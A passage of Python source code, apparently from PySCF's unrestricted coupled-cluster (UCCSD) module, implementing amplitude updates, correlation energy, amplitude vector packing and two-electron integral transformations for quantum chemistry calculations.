u2bb += 2*lib.einsum('mIeA,mBeJ->IJAB', t2ab, woVvO)
u2ab += lib.einsum('imae,mBeJ->iJaB', t2aa, woVvO)
u2ab += lib.einsum('iMaE,MBEJ->iJaB', t2ab, wOVVO)
u2ab += lib.einsum('iMeA,MbeJ->iJbA', t2ab, wOvvO)
u2ab += lib.einsum('IMAE,MbEj->jIbA', t2bb, wOvVo)
u2ab += lib.einsum('mIeA,mbej->jIbA', t2ab, wovvo)
u2ab += lib.einsum('mIaE,mBEj->jIaB', t2ab, woVVo)
wovvo = wOVVO = woVvO = wOvVo = woVVo = wOvvO = None
Ftmpa = Fvva - .5*lib.einsum('mb,me->be', t1a, Fova)
Ftmpb = Fvvb - .5*lib.einsum('mb,me->be', t1b, Fovb)
u2aa += lib.einsum('ijae,be->ijab', t2aa, Ftmpa)
u2bb += lib.einsum('ijae,be->ijab', t2bb, Ftmpb)
u2ab += lib.einsum('iJaE,BE->iJaB', t2ab, Ftmpb)
u2ab += lib.einsum('iJeA,be->iJbA', t2ab, Ftmpa)
Ftmpa = Fooa + 0.5*lib.einsum('je,me->mj', t1a, Fova)
Ftmpb = Foob + 0.5*lib.einsum('je,me->mj', t1b, Fovb)
u2aa -= lib.einsum('imab,mj->ijab', t2aa, Ftmpa)
u2bb -= lib.einsum('imab,mj->ijab', t2bb, Ftmpb)
u2ab -= lib.einsum('iMaB,MJ->iJaB', t2ab, Ftmpb)
u2ab -= lib.einsum('mIaB,mj->jIaB', t2ab, Ftmpa)
eris_ovoo = np.asarray(eris.ovoo).conj()
eris_OVOO = np.asarray(eris.OVOO).conj()
eris_OVoo = np.asarray(eris.OVoo).conj()
eris_ovOO = np.asarray(eris.ovOO).conj()
ovoo = eris_ovoo - eris_ovoo.transpose(2,1,0,3)
OVOO = eris_OVOO - eris_OVOO.transpose(2,1,0,3)
u2aa -= lib.einsum('ma,jbim->ijab', t1a, ovoo)
u2bb -= lib.einsum('ma,jbim->ijab', t1b, OVOO)
u2ab -= lib.einsum('ma,JBim->iJaB', t1a, eris_OVoo)
u2ab -= lib.einsum('MA,ibJM->iJbA', t1b, eris_ovOO)
eris_ovoo = eris_OVoo = eris_OVOO = eris_ovOO = None
u2aa *= .5
u2bb *= .5
u2aa = u2aa - u2aa.transpose(0,1,3,2)
u2aa = u2aa - u2aa.transpose(1,0,2,3)
u2bb = u2bb - u2bb.transpose(0,1,3,2)
u2bb = u2bb - u2bb.transpose(1,0,2,3)
eia_a = lib.direct_sum('i-a->ia', mo_ea_o, mo_ea_v)
eia_b = lib.direct_sum('i-a->ia', mo_eb_o, mo_eb_v)
u1a /= eia_a
u1b /= eia_b
u2aa /= lib.direct_sum('ia+jb->ijab', eia_a, eia_a)
u2ab /= lib.direct_sum('ia+jb->ijab', eia_a, eia_b)
u2bb /= lib.direct_sum('ia+jb->ijab', eia_b, eia_b)
time0 = log.timer_debug1('update t1 t2', *time0)
t1new = u1a, u1b
t2new = u2aa, u2ab, u2bb
return t1new, t2new
def energy(cc, t1=None, t2=None, eris=None):
'''UCCSD correlation energy'''
if t1 is None: t1 = cc.t1
if t2 is None: t2 = cc.t2
if eris is None: eris = cc.ao2mo()
t1a, t1b = t1
t2aa, t2ab, t2bb = t2
nocca, noccb, nvira, nvirb = t2ab.shape
eris_ovov = np.asarray(eris.ovov)
eris_OVOV = np.asarray(eris.OVOV)
eris_ovOV = np.asarray(eris.ovOV)
fova = eris.focka[:nocca,nocca:]
fovb = eris.fockb[:noccb,noccb:]
e = np.einsum('ia,ia', fova, t1a)
e += np.einsum('ia,ia', fovb, t1b)
e += 0.25*np.einsum('ijab,iajb',t2aa,eris_ovov)
e -= 0.25*np.einsum('ijab,ibja',t2aa,eris_ovov)
e += 0.25*np.einsum('ijab,iajb',t2bb,eris_OVOV)
e -= 0.25*np.einsum('ijab,ibja',t2bb,eris_OVOV)
e += np.einsum('iJaB,iaJB',t2ab,eris_ovOV)
e += 0.5*np.einsum('ia,jb,iajb',t1a,t1a,eris_ovov)
e -= 0.5*np.einsum('ia,jb,ibja',t1a,t1a,eris_ovov)
e += 0.5*np.einsum('ia,jb,iajb',t1b,t1b,eris_OVOV)
e -= 0.5*np.einsum('ia,jb,ibja',t1b,t1b,eris_OVOV)
e += np.einsum('ia,jb,iajb',t1a,t1b,eris_ovOV)
if abs(e.imag) > 1e-4:
logger.warn(cc, 'Non-zero imaginary part found in UCCSD energy %s', e)
return e.real
get_nocc = ump2.get_nocc
get_nmo = ump2.get_nmo
get_frozen_mask = ump2.get_frozen_mask
def amplitudes_to_vector(t1, t2, out=None):
nocca, nvira = t1[0].shape
noccb, nvirb = t1[1].shape
sizea = nocca * nvira + nocca*(nocca-1)//2*nvira*(nvira-1)//2
sizeb = noccb * nvirb + noccb*(noccb-1)//2*nvirb*(nvirb-1)//2
sizeab = nocca * noccb * nvira * nvirb
vector = np.ndarray(sizea+sizeb+sizeab, t2[0].dtype, buffer=out)
ccsd.amplitudes_to_vector_s4(t1[0], t2[0], out=vector[:sizea])
ccsd.amplitudes_to_vector_s4(t1[1], t2[2], out=vector[sizea:])
vector[sizea+sizeb:] = t2[1].ravel()
return vector
def vector_to_amplitudes(vector, nmo, nocc):
nocca, noccb = nocc
nmoa, nmob = nmo
nvira, nvirb = nmoa-nocca, nmob-noccb
nocc = nocca + noccb
nvir = nvira + nvirb
nov = nocc * nvir
size = nov + nocc*(nocc-1)//2*nvir*(nvir-1)//2
if vector.size == size:
#return ccsd.vector_to_amplitudes_s4(vector, nmo, nocc)
        raise RuntimeError('Input vector is a GCCSD vector')
else:
sizea = nocca * nvira + nocca*(nocca-1)//2*nvira*(nvira-1)//2
sizeb = noccb * nvirb + noccb*(noccb-1)//2*nvirb*(nvirb-1)//2
sections = np.cumsum([sizea, sizeb])
veca, vecb, t2ab = np.split(vector, sections)
t1a, t2aa = ccsd.vector_to_amplitudes_s4(veca, nmoa, nocca)
t1b, t2bb = ccsd.vector_to_amplitudes_s4(vecb, nmob, noccb)
t2ab = t2ab.copy().reshape(nocca,noccb,nvira,nvirb)
return (t1a,t1b), (t2aa,t2ab,t2bb)
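# Illustrative round-trip (sketch only; `mycc` and `eris` are assumed objects):
#     t1, t2 = mycc.init_amps(eris)[1:]
#     vec = amplitudes_to_vector(t1, t2)
#     t1r, t2r = vector_to_amplitudes(vec, mycc.nmo, mycc.nocc)
# t1r/t2r reproduce t1/t2: the aa and bb blocks travel in packed (s4) form
# inside `vec`, while the ab block is stored as a full array.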
def amplitudes_from_rccsd(t1, t2):
t2aa = t2 - t2.transpose(0,1,3,2)
return (t1,t1), (t2aa,t2,t2aa)
def _add_vvVV(mycc, t1, t2ab, eris, out=None):
'''Ht2 = np.einsum('iJcD,acBD->iJaB', t2ab, vvVV)
without using symmetry in t2ab or Ht2
'''
time0 = time.clock(), time.time()
if t2ab.size == 0:
return np.zeros_like(t2ab)
if t1 is not None:
t2ab = make_tau_ab(t2ab, t1, t1)
log = logger.Logger(mycc.stdout, mycc.verbose)
nocca, noccb, nvira, nvirb = t2ab.shape
if mycc.direct: # AO direct CCSD
if getattr(eris, 'mo_coeff', None) is not None:
mo_a, mo_b = eris.mo_coeff
else:
moidxa, moidxb = mycc.get_frozen_mask()
mo_a = mycc.mo_coeff[0][:,moidxa]
mo_b = mycc.mo_coeff[1][:,moidxb]
        # Note: tensor t2ab may be t2bbab from the eom_uccsd code.  In that
        # particular case, nocca and noccb do not equal the actual numbers of
        # alpha/beta occupied orbitals, so orbva and orbvb cannot be indexed
        # as mo_a[:,nocca:] and mo_b[:,noccb:]
orbva = mo_a[:,-nvira:]
orbvb = mo_b[:,-nvirb:]
tau = lib.einsum('ijab,pa->ijpb', t2ab, orbva)
tau = lib.einsum('ijab,pb->ijap', tau, orbvb)
time0 = logger.timer_debug1(mycc, 'vvvv-tau mo2ao', *time0)
buf = eris._contract_vvVV_t2(mycc, tau, mycc.direct, out, log)
mo = np.asarray(np.hstack((orbva, orbvb)), order='F')
Ht2 = _ao2mo.nr_e2(buf.reshape(nocca*noccb,-1), mo.conj(),
(0,nvira,nvira,nvira+nvirb), 's1', 's1')
return Ht2.reshape(t2ab.shape)
else:
return eris._contract_vvVV_t2(mycc, t2ab, mycc.direct, out, log)
def _add_vvvv(mycc, t1, t2, eris, out=None, with_ovvv=False, t2sym=None):
time0 = time.clock(), time.time()
log = logger.Logger(mycc.stdout, mycc.verbose)
if t1 is None:
t2aa, t2ab, t2bb = t2
else:
t2aa, t2ab, t2bb = make_tau(t2, t1, t1)
nocca, nvira = t2aa.shape[1:3]
noccb, nvirb = t2bb.shape[1:3]
if mycc.direct:
assert(t2sym is None)
if with_ovvv:
raise NotImplementedError
if getattr(eris, 'mo_coeff', None) is not None:
mo_a, mo_b = eris.mo_coeff
else:
moidxa, moidxb = mycc.get_frozen_mask()
mo_a = mycc.mo_coeff[0][:,moidxa]
mo_b = mycc.mo_coeff[1][:,moidxb]
nao = mo_a.shape[0]
otrila = np.tril_indices(nocca,-1)
otrilb = np.tril_indices(noccb,-1)
if nocca > 1:
tauaa = lib.einsum('xab,pa->xpb', t2aa[otrila], mo_a[:,nocca:])
tauaa = lib.einsum('xab,pb->xap', tauaa, mo_a[:,nocca:])
else:
tauaa = np.zeros((0,nao,nao))
if noccb > 1:
taubb = lib.einsum('xab,pa->xpb', t2bb[otrilb], mo_b[:,noccb:])
taubb = lib.einsum('xab,pb->xap', taubb, mo_b[:,noccb:])
else:
taubb = np.zeros((0,nao,nao))
tauab = lib.einsum('ijab,pa->ijpb', t2ab, mo_a[:,nocca:])
tauab = lib.einsum('ijab,pb->ijap', tauab, mo_b[:,noccb:])
tau = np.vstack((tauaa, taubb, tauab.reshape(nocca*noccb,nao,nao)))
tauaa = taubb = tauab = None
time0 = log.timer_debug1('vvvv-tau', *time0)
buf = ccsd._contract_vvvv_t2(mycc, mycc.mol, None, tau, out, log)
mo = np.asarray(np.hstack((mo_a[:,nocca:], mo_b[:,noccb:])), order='F')
u2aa = np.zeros_like(t2aa)
if nocca > 1:
u2tril = buf[:otrila[0].size]
u2tril = _ao2mo.nr_e2(u2tril.reshape(-1,nao**2), mo.conj(),
(0,nvira,0,nvira), 's1', 's1')
u2tril = u2tril.reshape(otrila[0].size,nvira,nvira)
u2aa[otrila[1],otrila[0]] = u2tril.transpose(0,2,1)
u2aa[otrila] = u2tril
u2bb = np.zeros_like(t2bb)
if noccb > 1:
u2tril = buf[otrila[0].size:otrila[0].size+otrilb[0].size]
u2tril = _ao2mo.nr_e2(u2tril.reshape(-1,nao**2), mo.conj(),
(nvira,nvira+nvirb,nvira,nvira+nvirb), 's1', 's1')
u2tril = u2tril.reshape(otrilb[0].size,nvirb,nvirb)
u2bb[otrilb[1],otrilb[0]] = u2tril.transpose(0,2,1)
u2bb[otrilb] = u2tril
u2ab = _ao2mo.nr_e2(buf[-nocca*noccb:].reshape(nocca*noccb,nao**2), mo,
(0,nvira,nvira,nvira+nvirb), 's1', 's1')
u2ab = u2ab.reshape(t2ab.shape)
else:
assert(not with_ovvv)
if t2sym is None:
tmp = eris._contract_vvvv_t2(mycc, t2aa[np.tril_indices(nocca)],
mycc.direct, None)
u2aa = ccsd._unpack_t2_tril(tmp, nocca, nvira, None, 'jiba')
tmp = eris._contract_VVVV_t2(mycc, t2bb[np.tril_indices(noccb)],
mycc.direct, None)
u2bb = ccsd._unpack_t2_tril(tmp, noccb, nvirb, None, 'jiba')
u2ab = eris._contract_vvVV_t2(mycc, t2ab, mycc.direct, None)
else:
u2aa = eris._contract_vvvv_t2(mycc, t2aa, mycc.direct, None)
u2bb = eris._contract_VVVV_t2(mycc, t2bb, mycc.direct, None)
u2ab = eris._contract_vvVV_t2(mycc, t2ab, mycc.direct, None)
return u2aa,u2ab,u2bb
class UCCSD(ccsd.CCSD):
conv_tol = getattr(__config__, 'cc_uccsd_UCCSD_conv_tol', 1e-7)
conv_tol_normt = getattr(__config__, 'cc_uccsd_UCCSD_conv_tol_normt', 1e-6)
    # The attribute `frozen` can be
    # * An integer : the same number of innermost alpha and beta orbitals are frozen
    # * One list : the same alpha and beta orbital indices are frozen
    # * A pair of lists : the first list gives the orbital indices to freeze for
    #   alpha orbitals, the second list for beta orbitals
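    # Illustrative values (sketch only; `mf` denotes a converged UHF object):
    #   UCCSD(mf, frozen=2)                 # freeze 2 alpha and 2 beta core orbitals
    #   UCCSD(mf, frozen=[0, 1])            # freeze orbitals 0 and 1 for both spins
    #   UCCSD(mf, frozen=[[0, 1], [0, 2]])  # different frozen lists for alpha/beta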
def __init__(self, mf, frozen=0, mo_coeff=None, mo_occ=None):
assert isinstance(mf, scf.uhf.UHF)
ccsd.CCSD.__init__(self, mf, frozen, mo_coeff, mo_occ)
get_nocc = get_nocc
get_nmo = get_nmo
get_frozen_mask = get_frozen_mask
def init_amps(self, eris=None):
time0 = time.clock(), time.time()
if eris is None:
eris = self.ao2mo(self.mo_coeff)
nocca, noccb = self.nocc
fova = eris.focka[:nocca,nocca:]
fovb = eris.fockb[:noccb,noccb:]
mo_ea_o = eris.mo_energy[0][:nocca]
mo_ea_v = eris.mo_energy[0][nocca:]
mo_eb_o = eris.mo_energy[1][:noccb]
mo_eb_v = eris.mo_energy[1][noccb:]
eia_a = lib.direct_sum('i-a->ia', mo_ea_o, mo_ea_v)
eia_b = lib.direct_sum('i-a->ia', mo_eb_o, mo_eb_v)
t1a = fova.conj() / eia_a
t1b = fovb.conj() / eia_b
eris_ovov = np.asarray(eris.ovov)
eris_OVOV = np.asarray(eris.OVOV)
eris_ovOV = np.asarray(eris.ovOV)
t2aa = eris_ovov.transpose(0,2,1,3) / lib.direct_sum('ia+jb->ijab', eia_a, eia_a)
t2ab = eris_ovOV.transpose(0,2,1,3) / lib.direct_sum('ia+jb->ijab', eia_a, eia_b)
t2bb = eris_OVOV.transpose(0,2,1,3) / lib.direct_sum('ia+jb->ijab', eia_b, eia_b)
t2aa = t2aa - t2aa.transpose(0,1,3,2)
t2bb = t2bb - t2bb.transpose(0,1,3,2)
e = np.einsum('iJaB,iaJB', t2ab, eris_ovOV)
e += 0.25*np.einsum('ijab,iajb', t2aa, eris_ovov)
e -= 0.25*np.einsum('ijab,ibja', t2aa, eris_ovov)
e += 0.25*np.einsum('ijab,iajb', t2bb, eris_OVOV)
e -= 0.25*np.einsum('ijab,ibja', t2bb, eris_OVOV)
self.emp2 = e.real
logger.info(self, 'Init t2, MP2 energy = %.15g', self.emp2)
logger.timer(self, 'init mp2', *time0)
return self.emp2, (t1a,t1b), (t2aa,t2ab,t2bb)
energy = energy
update_amps = update_amps
_add_vvvv = _add_vvvv
_add_vvVV = _add_vvVV
def kernel(self, t1=None, t2=None, eris=None, mbpt2=False):
return self.ccsd(t1, t2, eris, mbpt2)
def ccsd(self, t1=None, t2=None, eris=None, mbpt2=False):
'''Ground-state unrestricted (U)CCSD.
Kwargs:
mbpt2 : bool
Use one-shot MBPT2 approximation to CCSD.
'''
if mbpt2:
pt = ump2.UMP2(self._scf, self.frozen, self.mo_coeff, self.mo_occ)
self.e_corr, self.t2 = pt.kernel(eris=eris)
t2ab = self.t2[1]
nocca, noccb, nvira, nvirb = t2ab.shape
self.t1 = (np.zeros((nocca,nvira)), np.zeros((noccb,nvirb)))
return self.e_corr, self.t1, self.t2
return ccsd.CCSD.ccsd(self, t1, t2, eris)
def solve_lambda(self, t1=None, t2=None, l1=None, l2=None,
eris=None):
from pyscf.cc import uccsd_lambda
if t1 is None: t1 = self.t1
if t2 is None: t2 = self.t2
if eris is None: eris = self.ao2mo(self.mo_coeff)
self.converged_lambda, self.l1, self.l2 = \
uccsd_lambda.kernel(self, eris, t1, t2, l1, l2,
max_cycle=self.max_cycle,
tol=self.conv_tol_normt,
verbose=self.verbose)
return self.l1, self.l2
def ccsd_t(self, t1=None, t2=None, eris=None):
from pyscf.cc import uccsd_t
if t1 is None: t1 = self.t1
if t2 is None: t2 = self.t2
if eris is None: eris = self.ao2mo(self.mo_coeff)
return uccsd_t.kernel(self, eris, t1, t2, self.verbose)
uccsd_t = ccsd_t
def make_rdm1(self, t1=None, t2=None, l1=None, l2=None, ao_repr=False):
'''Un-relaxed 1-particle density matrix in MO space
Returns:
dm1a, dm1b
'''
from pyscf.cc import uccsd_rdm
if t1 is None: t1 = self.t1
if t2 is None: t2 = self.t2
if l1 is None: l1 = self.l1
if l2 is None: l2 = self.l2
if l1 is None: l1, l2 = self.solve_lambda(t1, t2)
return uccsd_rdm.make_rdm1(self, t1, t2, l1, l2, ao_repr=ao_repr)
def make_rdm2(self, t1=None, t2=None, l1=None, l2=None, ao_repr=False):
        '''2-particle density matrix in spin-orbital basis.
'''
from pyscf.cc import uccsd_rdm
if t1 is None: t1 = self.t1
if t2 is None: t2 = self.t2
if l1 is None: l1 = self.l1
if l2 is None: l2 = self.l2
if l1 is None: l1, l2 = self.solve_lambda(t1, t2)
return uccsd_rdm.make_rdm2(self, t1, t2, l1, l2, ao_repr=ao_repr)
def spin_square(self, mo_coeff=None, s=None):
from pyscf.fci.spin_op import spin_square_general
if mo_coeff is None:
mo_coeff = self.mo_coeff
if s is None:
s = self._scf.get_ovlp()
dma,dmb = self.make_rdm1()
dmaa,dmab,dmbb = self.make_rdm2()
return spin_square_general(dma,dmb,dmaa,dmab,dmbb,mo_coeff,s)
def ao2mo(self, mo_coeff=None):
nmoa, nmob = self.get_nmo()
nao = self.mo_coeff[0].shape[0]
nmo_pair = nmoa * (nmoa+1) // 2
nao_pair = nao * (nao+1) // 2
mem_incore = (max(nao_pair**2, nmoa**4) + nmo_pair**2) * 8/1e6
mem_now = lib.current_memory()[0]
if (self._scf._eri is not None and
(mem_incore+mem_now < self.max_memory or self.incore_complete)):
return _make_eris_incore(self, mo_coeff)
elif getattr(self._scf, 'with_df', None):
logger.warn(self, 'UCCSD detected DF being used in the HF object. '
'MO integrals are computed based on the DF 3-index tensors.\n'
'It\'s recommended to use dfccsd.CCSD for the '
'DF-CCSD calculations')
raise NotImplementedError
else:
return _make_eris_outcore(self, mo_coeff)
def ipccsd(self, nroots=1, left=False, koopmans=False, guess=None,
partition=None, eris=None):
from pyscf.cc import eom_uccsd
return eom_uccsd.EOMIP(self).kernel(nroots, left, koopmans, guess,
partition, eris)
def eaccsd(self, nroots=1, left=False, koopmans=False, guess=None,
partition=None, eris=None):
from pyscf.cc import eom_uccsd
return eom_uccsd.EOMEA(self).kernel(nroots, left, koopmans, guess,
partition, eris)
def eeccsd(self, nroots=1, koopmans=False, guess=None, eris=None):
from pyscf.cc import eom_uccsd
return eom_uccsd.EOMEE(self).kernel(nroots, koopmans, guess, eris)
def eomee_ccsd(self, nroots=1, koopmans=False, guess=None, eris=None):
from pyscf.cc import eom_uccsd
return eom_uccsd.EOMEESpinKeep(self).kernel(nroots, koopmans, guess, eris)
def eomsf_ccsd(self, nroots=1, koopmans=False, guess=None, eris=None):
from pyscf.cc import eom_uccsd
return eom_uccsd.EOMEESpinFlip(self).kernel(nroots, koopmans, guess, eris)
def eomip_method(self):
from pyscf.cc import eom_uccsd
return eom_uccsd.EOMIP(self)
def eomea_method(self):
from pyscf.cc import eom_uccsd
return eom_uccsd.EOMEA(self)
def eomee_method(self):
from pyscf.cc import eom_uccsd
return eom_uccsd.EOMEE(self)
def density_fit(self):
raise NotImplementedError
def nuc_grad_method(self):
from pyscf.grad import uccsd
return uccsd.Gradients(self)
def amplitudes_to_vector(self, t1, t2, out=None):
return amplitudes_to_vector(t1, t2, out)
def vector_to_amplitudes(self, vector, nmo=None, nocc=None):
if nocc is None: nocc = self.nocc
if nmo is None: nmo = self.nmo
return vector_to_amplitudes(vector, nmo, nocc)
def vector_size(self, nmo=None, nocc=None):
if nocc is None: nocc = self.nocc
if nmo is None: nmo = self.nmo
nocca, noccb = nocc
nmoa, nmob = nmo
nvira, nvirb = nmoa-nocca, nmob-noccb
sizea = nocca * nvira + nocca*(nocca-1)//2*nvira*(nvira-1)//2
sizeb = noccb * nvirb + noccb*(noccb-1)//2*nvirb*(nvirb-1)//2
sizeab = nocca * noccb * nvira * nvirb
return sizea + sizeb + sizeab
def amplitudes_from_rccsd(self, t1, t2):
return amplitudes_from_rccsd(t1, t2)
def get_t1_diagnostic(self, t1=None):
if t1 is None: t1 = self.t1
raise NotImplementedError
#return get_t1_diagnostic(t1)
def get_d1_diagnostic(self, t1=None):
if t1 is None: t1 = self.t1
raise NotImplementedError
#return get_d1_diagnostic(t1)
def get_d2_diagnostic(self, t2=None):
if t2 is None: t2 = self.t2
raise NotImplementedError
#return get_d2_diagnostic(t2)
CCSD = UCCSD
class _ChemistsERIs(ccsd._ChemistsERIs):
def __init__(self, mol=None):
ccsd._ChemistsERIs.__init__(self, mol)
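        # Naming convention: lower-case o/v index alpha-spin occupied/virtual
        # orbitals, upper-case O/V index beta-spin; e.g. ovOV holds the
        # mixed-spin (ia|JB) integral block in chemists' notation.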
self.OOOO = None
self.OVOO = None
self.OVOV = None
self.OOVV = None
self.OVVO = None
self.OVVV = None
self.VVVV = None
self.ooOO = None
self.ovOO = None
self.ovOV = None
self.ooVV = None
self.ovVO = None
self.ovVV = None
self.vvVV = None
self.OVoo = None
self.OOvv = None
self.OVvo = None
def _common_init_(self, mycc, mo_coeff=None):
if mo_coeff is None:
mo_coeff = mycc.mo_coeff
mo_idx = mycc.get_frozen_mask()
self.mo_coeff = mo_coeff = \
(mo_coeff[0][:,mo_idx[0]], mo_coeff[1][:,mo_idx[1]])
# Note: Recomputed fock matrix since SCF may not be fully converged.
dm = mycc._scf.make_rdm1(mycc.mo_coeff, mycc.mo_occ)
vhf = mycc._scf.get_veff(mycc.mol, dm)
fockao = mycc._scf.get_fock(vhf=vhf, dm=dm)
self.focka = reduce(np.dot, (mo_coeff[0].conj().T, fockao[0], mo_coeff[0]))
self.fockb = reduce(np.dot, (mo_coeff[1].conj().T, fockao[1], mo_coeff[1]))
self.fock = (self.focka, self.fockb)
self.e_hf = mycc._scf.energy_tot(dm=dm, vhf=vhf)
nocca, noccb = self.nocc = mycc.nocc
self.mol = mycc.mol
mo_ea = self.focka.diagonal().real
mo_eb = self.fockb.diagonal().real
self.mo_energy = (mo_ea, mo_eb)
gap_a = abs(mo_ea[:nocca,None] - mo_ea[None,nocca:])
gap_b = abs(mo_eb[:noccb,None] - mo_eb[None,noccb:])
if gap_a.size > 0:
gap_a = gap_a.min()
else:
gap_a = 1e9
if gap_b.size > 0:
gap_b = gap_b.min()
else:
gap_b = 1e9
if gap_a < 1e-5 or gap_b < 1e-5:
logger.warn(mycc, 'HOMO-LUMO gap (%s,%s) too small for UCCSD',
gap_a, gap_b)
return self
def get_ovvv(self, *slices):
return _get_ovvv_base(self.ovvv, *slices)
def get_ovVV(self, *slices):
return _get_ovvv_base(self.ovVV, *slices)
def get_OVvv(self, *slices):
return _get_ovvv_base(self.OVvv, *slices)
def get_OVVV(self, *slices):
return _get_ovvv_base(self.OVVV, *slices)
def _contract_VVVV_t2(self, mycc, t2, vvvv_or_direct=False, out=None, verbose=None):
if isinstance(vvvv_or_direct, np.ndarray):
vvvv = vvvv_or_direct
elif vvvv_or_direct:
vvvv = None
else:
vvvv = self.VVVV
return ccsd._contract_vvvv_t2(mycc, self.mol, vvvv, t2, out, verbose)
def _contract_vvVV_t2(self, mycc, t2, vvvv_or_direct=False, out=None, verbose=None):
if isinstance(vvvv_or_direct, np.ndarray):
vvvv = vvvv_or_direct
elif vvvv_or_direct:
vvvv = None
else:
vvvv = self.vvVV
return ccsd._contract_vvvv_t2(mycc, self.mol, vvvv, t2, out, verbose)
def _get_ovvv_base(ovvv, *slices):
if len(ovvv.shape) == 3: # DO NOT use .ndim here for h5py library
        # backward compatibility
ovw = np.asarray(ovvv[slices])
nocc, nvir, nvir_pair = ovw.shape
ovvv = lib.unpack_tril(ovw.reshape(nocc*nvir,nvir_pair))
nvir1 = ovvv.shape[2]
return ovvv.reshape(nocc,nvir,nvir1,nvir1)
elif slices:
return ovvv[slices]
else:
return ovvv
def _make_eris_incore(mycc, mo_coeff=None, ao2mofn=None):
cput0 = (time.clock(), time.time())
eris = _ChemistsERIs()
eris._common_init_(mycc, mo_coeff)
nocca, noccb = mycc.nocc
nmoa, nmob = mycc.nmo
nvira, nvirb = nmoa-nocca, nmob-noccb
moa = eris.mo_coeff[0]
mob = eris.mo_coeff[1]
nmoa = moa.shape[1]
nmob = mob.shape[1]
if callable(ao2mofn):
eri_aa = ao2mofn(moa).reshape([nmoa]*4)
eri_bb = ao2mofn(mob).reshape([nmob]*4)
eri_ab = ao2mofn((moa,moa,mob,mob))
else:
eri_aa = ao2mo.restore(1, ao2mo.full(mycc._scf._eri, moa), nmoa)
eri_bb = ao2mo.restore(1, ao2mo.full(mycc._scf._eri, mob), nmob)
eri_ab = ao2mo.general(mycc._scf._eri, (moa,moa,mob,mob), compact=False)
eri_ba = eri_ab.reshape(nmoa,nmoa,nmob,nmob).transpose(2,3,0,1)
eri_aa = eri_aa.reshape(nmoa,nmoa,nmoa,nmoa)
eri_ab = eri_ab.reshape(nmoa,nmoa,nmob,nmob)
eri_ba = eri_ba.reshape(nmob,nmob,nmoa,nmoa)
eri_bb = eri_bb.reshape(nmob,nmob,nmob,nmob)
eris.oooo = eri_aa[:nocca,:nocca,:nocca,:nocca].copy()
eris.ovoo = eri_aa[:nocca,nocca:,:nocca,:nocca].copy()
eris.ovov = eri_aa[:nocca,nocca:,:nocca,nocca:].copy()
eris.oovv = eri_aa[:nocca,:nocca,nocca:,nocca:].copy()
eris.ovvo = eri_aa[:nocca,nocca:,nocca:,:nocca].copy()
eris.ovvv = eri_aa[:nocca,nocca:,nocca:,nocca:].copy()
eris.vvvv = eri_aa[nocca:,nocca:,nocca:,nocca:].copy()
eris.OOOO = eri_bb[:noccb,:noccb,:noccb,:noccb].copy()
eris.OVOO = eri_bb[:noccb,noccb:,:noccb,:noccb].copy()
eris.OVOV = eri_bb[:noccb,noccb:,:noccb,noccb:].copy()
eris.OOVV = eri_bb[:noccb,:noccb,noccb:,noccb:].copy()
eris.OVVO = eri_bb[:noccb,noccb:,noccb:,:noccb].copy()
eris.OVVV = eri_bb[:noccb,noccb:,noccb:,noccb:].copy()
eris.VVVV = eri_bb[noccb:,noccb:,noccb:,noccb:].copy()
eris.ooOO = eri_ab[:nocca,:nocca,:noccb,:noccb].copy()
eris.ovOO = eri_ab[:nocca,nocca:,:noccb,:noccb].copy()
eris.ovOV = eri_ab[:nocca,nocca:,:noccb,noccb:].copy()
eris.ooVV = eri_ab[:nocca,:nocca,noccb:,noccb:].copy()
eris.ovVO = eri_ab[:nocca,nocca:,noccb:,:noccb].copy()
eris.ovVV = eri_ab[:nocca,nocca:,noccb:,noccb:].copy()
eris.vvVV = eri_ab[nocca:,nocca:,noccb:,noccb:].copy()
#eris.OOoo = eri_ba[:noccb,:noccb,:nocca,:nocca].copy()
eris.OVoo = eri_ba[:noccb,noccb:,:nocca,:nocca].copy()
#eris.OVov = eri_ba[:noccb,noccb:,:nocca,nocca:].copy()
eris.OOvv = eri_ba[:noccb,:noccb,nocca:,nocca:].copy()
eris.OVvo = eri_ba[:noccb,noccb:,nocca:,:nocca].copy()
eris.OVvv = eri_ba[:noccb,noccb:,nocca:,nocca:].copy()
#eris.VVvv = eri_ba[noccb:,noccb:,nocca:,nocca:].copy()
if not callable(ao2mofn):
ovvv = eris.ovvv.reshape(nocca*nvira,nvira,nvira)
eris.ovvv = lib.pack_tril(ovvv).reshape(nocca,nvira,nvira*(nvira+1)//2)
eris.vvvv = ao2mo.restore(4, eris.vvvv, nvira)
OVVV = eris.OVVV.reshape(noccb*nvirb,nvirb,nvirb)
eris.OVVV = lib.pack_tril(OVVV).reshape(noccb,nvirb,nvirb*(nvirb+1)//2)
eris.VVVV = ao2mo.restore(4, eris.VVVV, nvirb)
ovVV = eris.ovVV.reshape(nocca*nvira,nvirb,nvirb)
eris.ovVV = lib.pack_tril(ovVV).reshape(nocca,nvira,nvirb*(nvirb+1)//2)
vvVV = eris.vvVV.reshape(nvira**2,nvirb**2)
idxa = np.tril_indices(nvira)
idxb = np.tril_indices(nvirb)
eris.vvVV = lib.take_2d(vvVV, idxa[0]*nvira+idxa[1], idxb[0]*nvirb+idxb[1])
OVvv = eris.OVvv.reshape(noccb*nvirb,nvira,nvira)
eris.OVvv = lib.pack_tril(OVvv).reshape(noccb,nvirb,nvira*(nvira+1)//2)
return eris
def _make_eris_outcore(mycc, mo_coeff=None):
cput0 = (time.clock(), time.time())
eris = _ChemistsERIs()
eris._common_init_(mycc, mo_coeff)
nocca, noccb = mycc.nocc
nmoa, nmob = mycc.nmo
nvira, nvirb = nmoa-nocca, nmob-noccb
moa = eris.mo_coeff[0]
mob = eris.mo_coeff[1]
nmoa = moa.shape[1]
nmob = mob.shape[1]
orboa = moa[:,:nocca]
orbob = mob[:,:noccb]
orbva = moa[:,nocca:]
orbvb = mob[:,noccb:]
eris.feri = lib.H5TmpFile()
eris.oooo = eris.feri.create_dataset('oooo', (nocca,nocca,nocca,nocca), 'f8')
eris.ovoo = eris.feri.create_dataset('ovoo', (nocca,nvira,nocca,nocca), 'f8')
eris.ovov = eris.feri.create_dataset('ovov', (nocca,nvira,nocca,nvira), 'f8')
eris.oovv = eris.feri.create_dataset('oovv', (nocca,nocca,nvira,nvira), 'f8')
eris.ovvo = eris.feri.create_dataset('ovvo', (nocca,nvira,nvira,nocca), 'f8')
eris.ovvv = eris.feri.create_dataset('ovvv', (nocca,nvira,nvira*(nvira+1)//2), 'f8')
#eris.vvvv = eris.feri.create_dataset('vvvv', (nvira,nvira,nvira,nvira), 'f8')
eris.OOOO = eris.feri.create_dataset('OOOO', (noccb,noccb,noccb,noccb), 'f8')
